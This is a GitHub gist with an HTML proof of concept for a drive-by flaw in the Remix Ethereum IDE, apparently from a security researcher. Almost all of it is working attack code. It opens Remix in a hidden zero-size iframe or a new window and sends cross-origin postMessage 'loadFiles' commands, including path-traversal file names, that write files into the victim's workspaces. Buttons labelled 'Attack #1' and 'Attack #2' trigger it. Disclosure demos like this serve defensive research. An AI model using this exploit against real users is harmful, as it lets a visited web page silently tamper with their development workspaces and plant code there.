Skip to content

Instantly share code, notes, and snippets.

@tintinweb

tintinweb/remix-drive-by.gist.html Secret

Created March 27, 2021 17:41
Show Gist options
  • Save tintinweb/b7f513e7923ec83e7ddbfbd1c2cd59e7 to your computer and use it in GitHub Desktop.
Save tintinweb/b7f513e7923ec83e7ddbfbd1c2cd59e7 to your computer and use it in GitHub Desktop.
Download ZIP
remix drive-by vulnerability (iframe; optional window)
Raw
remix-drive-by.gist.html
<head>
<script>
function newHiddenIframe(cb) {
var ifrm = document.createElement("iframe");
ifrm.addEventListener("load", function () {
cb(ifrm.contentWindow);
setTimeout(function () {
cb(ifrm.contentWindow);
setTimeout(function () {
ifrm.parentNode.removeChild(ifrm);
}, 5000);
}, 10000);
});
ifrm.setAttribute("src", "https://remix.ethereum.org/");
ifrm.style.width = "0px";
ifrm.style.height = "0px";
document.body.appendChild(ifrm);
return ifrm;
}
function newWindow(cb) {
return window.open("https://remix.ethereum.org/", undefined);
}
function createOneFile(remix) {
let message = ["loadFiles", { ".workspaces/default_workspace/1_visit___github.com_tintinweb.sol": { "content": "boom!" } }];
remix.postMessage(message, '*');
}
function createMultipleWorkspaces(remix) {
let message = ["loadFiles", {
".workspaces/default_workspace/2_workspace_test.sol": { "content": "boom!" },
".workspaces/my_new_workspace/2_workspace_test.sol": { "content": "boom!" },
".workspaces/localhost/2_workspace_test.sol": { "content": "boom!" },
".workspaces/localhost/2_workspace_test.sol": { "content": "boom!" },
".workspaces/localhost/2_workspace_test.sol": { "content": "boom!" },
".workspaces/localhost/2_workspace_test.sol": { "content": "boom!" },
".workspaces/- visit github.com_tintinweb -/2_workspace_test.sol": { "content": "boom!" },
".workspaces/- visit www.oststrom.com -/2_workspace_test.sol": { "content": "boom!" },
".workspaces/- connect to localhost -/2_workspace_test.sol": { "content": "boom!" },
".workspaces/- connect to localhost - /2_workspace_test.sol": { "content": "boom!" },
".workspaces/- connect to localhost - /2_workspace_test.sol": { "content": "boom!" },
".workspaces/- connect to localhost - /2_workspace_test.sol": { "content": "boom!" },
".workspaces/- connect to localhost - /2_workspace_test.sol": { "content": "boom!" },
".workspaces/- connect to localhost - /2_workspace_test.sol": { "content": "boom!" },
".hiddenFile/somedir/somesubdir/../../blubb/2_workspace_test.sol": { "content": "boom!" },
".hiddenFile/somedir/somesubdir/../../blubb/2_workspace_test.sol": { "content": "boom!" },
".localhost/2_workspace_test.sol": { "content": "boom!" },
"localhost/2_workspace_test.sol": { "content": "boom!" },
"/2_workspace_test.sol": { "content": "boom!" },
"2_workspace_test.sol": { "content": "boom2!" },
}];
remix.postMessage(message, '*');
}
window.attack_iframe_1 = function () {
let remix = newHiddenIframe(function () {
createOneFile(remix.contentWindow);
});
}
window.attack_iframe_workspaces = function () {
let remix = newHiddenIframe(function () {
createMultipleWorkspaces(remix.contentWindow);
});
}
window.attack_window_1 = function () {
let remix = newWindow();
remix.addEventListener("load", function () {
setTimeout(function () {
createOneFile(remix);
remix.close();
});
});
}
window.attack_window_workspace = function () {
let remix = newWindow();
remix.addEventListener("load", function () {
setTimeout(function () {
createMultipleWorkspaces(remix);
remix.close();
});
});
}
</script>
</head>
<hr>
Click one of the buttons, wait 15 seconds for the magic to unfold, and then go to https://remix.ethereum.org.
<hr>
<div>
<button onclick="attack_iframe_1()">Attack #1 - Drop a file in the remix workspace</button>
<button onclick="attack_iframe_workspaces()">Attack #2 - Mess with the workspace :D</button>
</div>
<hr>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment